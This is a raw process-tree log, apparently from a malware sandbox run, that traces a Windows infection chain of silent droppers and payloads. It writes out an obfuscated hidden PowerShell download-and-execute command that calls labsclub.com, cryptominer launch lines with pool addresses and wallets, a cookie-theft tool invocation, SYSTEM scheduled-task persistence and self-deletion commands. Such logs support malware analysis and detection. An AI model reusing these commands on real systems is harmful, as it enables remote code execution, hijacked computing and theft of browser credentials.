C:\Users\Admin\AppData\Local\Temp\is-JQGJH.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-JQGJH.tmp\Setup3310.tmp" /SL5="$60476,138429,56832,C:\Users\Admin\AppData\Local\Temp\my2agerx3gz\Setup3310.exe" /Verysilent /subid=57712⤵
-
C:\Users\Admin\AppData\Local\Temp\is-SDNTU.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-SDNTU.tmp\Setup.exe" /Verysilent13⤵
- Drops file in Program Files directory
-
C:\Users\Admin\AppData\Local\Temp\0hqdwc5y1kq\app.exe"C:\Users\Admin\AppData\Local\Temp\0hqdwc5y1kq\app.exe" /8-2311⤵
-
C:\Users\Admin\AppData\Local\Temp\0hqdwc5y1kq\app.exe"C:\Users\Admin\AppData\Local\Temp\0hqdwc5y1kq\app.exe" /8-2312⤵
-
C:\Users\Admin\AppData\Local\Temp\dz1cxxiyq44\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\dz1cxxiyq44\cpyrix.exe" /VERYSILENT11⤵
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe12⤵
-
C:\Users\Admin\AppData\Roaming\1.exe"{path}"13⤵
-
C:\Users\Admin\AppData\Roaming\1.exe"{path}"13⤵
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe12⤵
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"13⤵
-
C:\Users\Admin\AppData\Local\Temp\haceb0jprs4\vict.exe"C:\Users\Admin\AppData\Local\Temp\haceb0jprs4\vict.exe" /VERYSILENT /id=53511⤵
- Modifies Internet Explorer settings
-
C:\Users\Admin\AppData\Local\Temp\is-HO1JE.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-HO1JE.tmp\vict.tmp" /SL5="$130174,870426,780800,C:\Users\Admin\AppData\Local\Temp\haceb0jprs4\vict.exe" /VERYSILENT /id=53512⤵
-
C:\Users\Admin\AppData\Local\Temp\is-DEPDG.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-DEPDG.tmp\win1host.exe" 53513⤵
-
C:\Users\Admin\AppData\Local\Temp\oz1d415bvi4\mrejkhgctu0.exe"C:\Users\Admin\AppData\Local\Temp\oz1d415bvi4\mrejkhgctu0.exe" /ustwo INSTALL11⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "mrejkhgctu0.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\oz1d415bvi4\mrejkhgctu0.exe" & exit12⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "mrejkhgctu0.exe" /f13⤵
- Kills process with taskkill
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\VXTJQA8NJ2\setups.exe"C:\Users\Admin\AppData\Local\Temp\VXTJQA8NJ2\setups.exe" ll8⤵
-
C:\Users\Admin\AppData\Local\Temp\is-RO27O.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-RO27O.tmp\setups.tmp" /SL5="$50350,454998,229376,C:\Users\Admin\AppData\Local\Temp\VXTJQA8NJ2\setups.exe" ll9⤵
- Checks computer location settings
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-UJ6S9.tmp\lylal220.tmp"C:\Users\Admin\AppData\Local\Temp\is-UJ6S9.tmp\lylal220.tmp" /SL5="$1020C,491750,408064,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-DRNGH.tmp\Microsoft.exe"C:\Users\Admin\AppData\Local\Temp\is-DRNGH.tmp\Microsoft.exe" /S /UID=lylal2204⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files\Internet Explorer\BLFFUEPUEI\irecord.exe"C:\Program Files\Internet Explorer\BLFFUEPUEI\irecord.exe" /VERYSILENT5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-75AP7.tmp\irecord.tmp"C:\Users\Admin\AppData\Local\Temp\is-75AP7.tmp\irecord.tmp" /SL5="$1028C,6265333,408064,C:\Program Files\Internet Explorer\BLFFUEPUEI\irecord.exe" /VERYSILENT6⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\a7-af632-9ba-cce89-ea168911e17d1\Dozhepohyqo.exe"C:\Users\Admin\AppData\Local\Temp\a7-af632-9ba-cce89-ea168911e17d1\Dozhepohyqo.exe"5⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\88-d8027-ab2-147a3-b04ff00288fd0\Peshedijuzha.exe"C:\Users\Admin\AppData\Local\Temp\88-d8027-ab2-147a3-b04ff00288fd0\Peshedijuzha.exe"5⤵
- Executes dropped EXE
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lc3cie1a.djd\md6_6ydj.exe & exit6⤵
-
C:\Users\Admin\AppData\Local\Temp\lc3cie1a.djd\md6_6ydj.exeC:\Users\Admin\AppData\Local\Temp\lc3cie1a.djd\md6_6ydj.exe7⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\e1rc4ltz.us0\askinstall31.exe & exit6⤵
-
C:\Users\Admin\AppData\Local\Temp\e1rc4ltz.us0\askinstall31.exeC:\Users\Admin\AppData\Local\Temp\e1rc4ltz.us0\askinstall31.exe7⤵
- Executes dropped EXE
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hhhuooux.vjt\toolspab1.exe & exit6⤵
-
C:\Users\Admin\AppData\Local\Temp\hhhuooux.vjt\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\hhhuooux.vjt\toolspab1.exe7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\hhhuooux.vjt\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\hhhuooux.vjt\toolspab1.exe8⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\keqlza33.xkz\GcleanerWW.exe /mixone & exit6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xw4b0zky.qkd\setup_10.2_mix.exe & exit6⤵
-
C:\Users\Admin\AppData\Local\Temp\xw4b0zky.qkd\setup_10.2_mix.exeC:\Users\Admin\AppData\Local\Temp\xw4b0zky.qkd\setup_10.2_mix.exe7⤵
- Drops file in Program Files directory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dyarhs3h.yqq\file.exe & exit6⤵
-
C:\Users\Admin\AppData\Local\Temp\dyarhs3h.yqq\file.exeC:\Users\Admin\AppData\Local\Temp\dyarhs3h.yqq\file.exe7⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\GPT532NZPG\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\GPT532NZPG\multitimer.exe" 0 3060197d33d91c80.94013368 0 1019⤵
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\GPT532NZPG\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\GPT532NZPG\multitimer.exe" 1 3.1617574203.606a393bb086b 10110⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\GPT532NZPG\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\GPT532NZPG\multitimer.exe" 2 3.1617574203.606a393bb086b11⤵
- Checks for any installed AV software in registry
-
C:\Users\Admin\AppData\Local\Temp\cix10clsg1r\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\cix10clsg1r\cpyrix.exe" /VERYSILENT12⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe13⤵
-
C:\Users\Admin\AppData\Roaming\1.exe"{path}"14⤵
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe13⤵
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"14⤵
-
C:\Users\Admin\AppData\Local\Temp\jba5xw14ekd\app.exe"C:\Users\Admin\AppData\Local\Temp\jba5xw14ekd\app.exe" /8-2312⤵
-
C:\Users\Admin\AppData\Local\Temp\jba5xw14ekd\app.exe"C:\Users\Admin\AppData\Local\Temp\jba5xw14ekd\app.exe" /8-2313⤵
-
C:\Users\Admin\AppData\Local\Temp\hmmzz3hfxo2\3phllehux0r.exe"C:\Users\Admin\AppData\Local\Temp\hmmzz3hfxo2\3phllehux0r.exe" /ustwo INSTALL12⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "3phllehux0r.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\hmmzz3hfxo2\3phllehux0r.exe" & exit13⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "3phllehux0r.exe" /f14⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\pj2llq1nezr\vict.exe"C:\Users\Admin\AppData\Local\Temp\pj2llq1nezr\vict.exe" /VERYSILENT /id=53512⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-KHEA5.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-KHEA5.tmp\vict.tmp" /SL5="$50474,870426,780800,C:\Users\Admin\AppData\Local\Temp\pj2llq1nezr\vict.exe" /VERYSILENT /id=53513⤵
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-FRV9J.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-FRV9J.tmp\win1host.exe" 53514⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\tuhkxekdinb\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\tuhkxekdinb\Setup3310.exe" /Verysilent /subid=57712⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-PGHVA.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-PGHVA.tmp\Setup3310.tmp" /SL5="$305E0,138429,56832,C:\Users\Admin\AppData\Local\Temp\tuhkxekdinb\Setup3310.exe" /Verysilent /subid=57713⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-3V02A.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-3V02A.tmp\Setup.exe" /Verysilent14⤵
-
C:\Users\Admin\AppData\Local\Temp\2RN4NUYX4T\setups.exe"C:\Users\Admin\AppData\Local\Temp\2RN4NUYX4T\setups.exe" ll9⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-KUJG5.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-KUJG5.tmp\setups.tmp" /SL5="$602B2,454998,229376,C:\Users\Admin\AppData\Local\Temp\2RN4NUYX4T\setups.exe" ll10⤵
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"8⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe9⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe10⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Full Program Features.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Full Program Features.exe"8⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"9⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install10⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"8⤵
- Modifies data under HKEY_USERS
-
C:\Users\Admin\AppData\Roaming\20DD.tmp.exe"C:\Users\Admin\AppData\Roaming\20DD.tmp.exe"9⤵
- Adds Run key to start application
- Suspicious use of SetThreadContext
-
C:\Windows\system32\msiexec.exe-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w16181 --cpu-max-threads-hint 50 -r 999910⤵
- Blocklisted process makes network request
-
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w10001@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 9999910⤵
-
C:\Users\Admin\AppData\Roaming\295A.tmp.exe"C:\Users\Admin\AppData\Roaming\295A.tmp.exe"9⤵
-
C:\Windows\SysWOW64\cmd.exe/c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Roaming\295A.tmp.exe10⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 311⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"9⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.110⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt9⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt9⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ih2zhro0.kkg\app.exe /8-2222 & exit6⤵
-
C:\Users\Admin\AppData\Local\Temp\ih2zhro0.kkg\app.exeC:\Users\Admin\AppData\Local\Temp\ih2zhro0.kkg\app.exe /8-22227⤵
-
C:\Users\Admin\AppData\Local\Temp\ih2zhro0.kkg\app.exe"C:\Users\Admin\AppData\Local\Temp\ih2zhro0.kkg\app.exe" /8-22228⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zuet43z3.fug\Four.exe & exit6⤵
-
C:\Users\Admin\AppData\Local\Temp\zuet43z3.fug\Four.exeC:\Users\Admin\AppData\Local\Temp\zuet43z3.fug\Four.exe7⤵
-
C:\Users\Admin\AppData\Local\Temp\TOUPVW9HJU\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\TOUPVW9HJU\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 1048⤵
-
C:\Users\Admin\AppData\Local\Temp\TOUPVW9HJU\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\TOUPVW9HJU\multitimer.exe" 1 3.1617574251.606a396b1ba13 1049⤵
-
C:\Users\Admin\AppData\Local\Temp\TOUPVW9HJU\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\TOUPVW9HJU\multitimer.exe" 2 3.1617574251.606a396b1ba1310⤵
-
C:\Users\Admin\AppData\Local\Temp\uqmguzs3k1a\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\uqmguzs3k1a\cpyrix.exe" /VERYSILENT11⤵
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe12⤵
-
C:\Users\Admin\AppData\Roaming\1.exe"{path}"13⤵
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe12⤵
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"13⤵
-
C:\Users\Admin\AppData\Local\Temp\ze54wpwjk0b\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\ze54wpwjk0b\Setup3310.exe" /Verysilent /subid=57711⤵
-
C:\Users\Admin\AppData\Local\Temp\is-G5IJO.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-G5IJO.tmp\Setup3310.tmp" /SL5="$506EA,138429,56832,C:\Users\Admin\AppData\Local\Temp\ze54wpwjk0b\Setup3310.exe" /Verysilent /subid=57712⤵
-
C:\Users\Admin\AppData\Local\Temp\is-8O6Q8.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-8O6Q8.tmp\Setup.exe" /Verysilent13⤵
-
C:\Users\Admin\AppData\Local\Temp\ecfulartmis\app.exe"C:\Users\Admin\AppData\Local\Temp\ecfulartmis\app.exe" /8-2311⤵
-
C:\Users\Admin\AppData\Local\Temp\ecfulartmis\app.exe"C:\Users\Admin\AppData\Local\Temp\ecfulartmis\app.exe" /8-2312⤵
-
C:\Users\Admin\AppData\Local\Temp\goht153hrgb\vict.exe"C:\Users\Admin\AppData\Local\Temp\goht153hrgb\vict.exe" /VERYSILENT /id=53511⤵
-
C:\Users\Admin\AppData\Local\Temp\is-RDBND.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-RDBND.tmp\vict.tmp" /SL5="$604E0,870426,780800,C:\Users\Admin\AppData\Local\Temp\goht153hrgb\vict.exe" /VERYSILENT /id=53512⤵
-
C:\Users\Admin\AppData\Local\Temp\is-CB1IP.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-CB1IP.tmp\win1host.exe" 53513⤵
-
C:\Users\Admin\AppData\Local\Temp\2jsmvz13xoc\k4i03m2xhsd.exe"C:\Users\Admin\AppData\Local\Temp\2jsmvz13xoc\k4i03m2xhsd.exe" /ustwo INSTALL11⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "k4i03m2xhsd.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\2jsmvz13xoc\k4i03m2xhsd.exe" & exit12⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "k4i03m2xhsd.exe" /f13⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\Z9XS54PBUB\setups.exe"C:\Users\Admin\AppData\Local\Temp\Z9XS54PBUB\setups.exe" ll8⤵
-
C:\Users\Admin\AppData\Local\Temp\is-1HA3M.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-1HA3M.tmp\setups.tmp" /SL5="$80604,454998,229376,C:\Users\Admin\AppData\Local\Temp\Z9XS54PBUB\setups.exe" ll9⤵
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\javcse\install.vbs"3⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\javcse\install.dll",install4⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\UA7OJ5RCK1\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\UA7OJ5RCK1\multitimer.exe" 0 306065bb10421b26.04333812 0 1033⤵
- Executes dropped EXE
- Maps connected drives based on registry
- Drops file in Windows directory
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\UA7OJ5RCK1\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\UA7OJ5RCK1\multitimer.exe" 1 3.1617574046.606a389e5730c 1034⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\UA7OJ5RCK1\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\UA7OJ5RCK1\multitimer.exe" 2 3.1617574046.606a389e5730c5⤵
- Executes dropped EXE
- Checks for any installed AV software in registry
-
C:\Users\Admin\AppData\Local\Temp\4w2vikca5hh\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\4w2vikca5hh\cpyrix.exe" /VERYSILENT6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\1.exe"{path}"8⤵
-
C:\Users\Admin\AppData\Roaming\1.exe"{path}"8⤵
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"8⤵
-
C:\Users\Admin\AppData\Local\Temp\rm2etdiley5\ei111qo1fyj.exe"C:\Users\Admin\AppData\Local\Temp\rm2etdiley5\ei111qo1fyj.exe" /VERYSILENT6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-8LPLS.tmp\ei111qo1fyj.tmp"C:\Users\Admin\AppData\Local\Temp\is-8LPLS.tmp\ei111qo1fyj.tmp" /SL5="$1036E,2592217,780800,C:\Users\Admin\AppData\Local\Temp\rm2etdiley5\ei111qo1fyj.exe" /VERYSILENT7⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\is-9OO5R.tmp\winlthsth.exe"C:\Users\Admin\AppData\Local\Temp\is-9OO5R.tmp\winlthsth.exe"8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\789XxuUZG.exe"C:\Users\Admin\AppData\Local\Temp\789XxuUZG.exe"9⤵
-
C:\Windows\SysWOW64\at.exe"C:\Windows\System32\at.exe"10⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Marito.gif10⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe11⤵
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^CaWSaeSvAdYkfzbpRfhIGeKeRfokmseCgqWsHlzIpUNnKXGDsJAgYjEmITwrUHXogvWfbyBGVFmLfksUIFTQRNDevvJNpd$" Amai.gif12⤵
-
C:\Users\Admin\AppData\Roaming\wipetKbAeQHS\Suono.exe.comSuono.exe.com U12⤵
-
C:\Users\Admin\AppData\Roaming\wipetKbAeQHS\Suono.exe.comC:\Users\Admin\AppData\Roaming\wipetKbAeQHS\Suono.exe.com U13⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /create /tn "mLdghlcqNQ" /tr "C:\\Users\\Admin\\AppData\\Roaming\\ThUbGJfUzN\\mLdghlcqNQ.exe.com C:\\Users\\Admin\\AppData\\Roaming\\ThUbGJfUzN\\s" /sc onstart /F /RU SYSTEM14⤵
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV115⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 3012⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\cmd.execmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"9⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"10⤵
- Blocklisted process makes network request
-
C:\Users\Admin\AppData\Local\Temp\f4cpxldsi3s\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\f4cpxldsi3s\Setup3310.exe" /Verysilent /subid=5776⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-88354.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-88354.tmp\Setup3310.tmp" /SL5="$10378,138429,56832,C:\Users\Admin\AppData\Local\Temp\f4cpxldsi3s\Setup3310.exe" /Verysilent /subid=5777⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\is-AFLTU.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-AFLTU.tmp\Setup.exe" /Verysilent8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\vbjy43onw34\01ltqhcgv4q.exe"C:\Users\Admin\AppData\Local\Temp\vbjy43onw34\01ltqhcgv4q.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\vbjy43onw34\01ltqhcgv4q.exe"7⤵
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30008⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\rmqdtxkjm2t\tyhrqw4xlm3.exe"C:\Users\Admin\AppData\Local\Temp\rmqdtxkjm2t\tyhrqw4xlm3.exe" /ustwo INSTALL6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "tyhrqw4xlm3.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\rmqdtxkjm2t\tyhrqw4xlm3.exe" & exit7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "tyhrqw4xlm3.exe" /f8⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\jackqivxgfe\vpn.exe"C:\Users\Admin\AppData\Local\Temp\jackqivxgfe\vpn.exe" /silent /subid=4826⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-QK2PL.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-QK2PL.tmp\vpn.tmp" /SL5="$1038C,15170975,270336,C:\Users\Admin\AppData\Local\Temp\jackqivxgfe\vpn.exe" /silent /subid=4827⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "8⤵
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap09019⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "8⤵
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap09019⤵
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall8⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install8⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
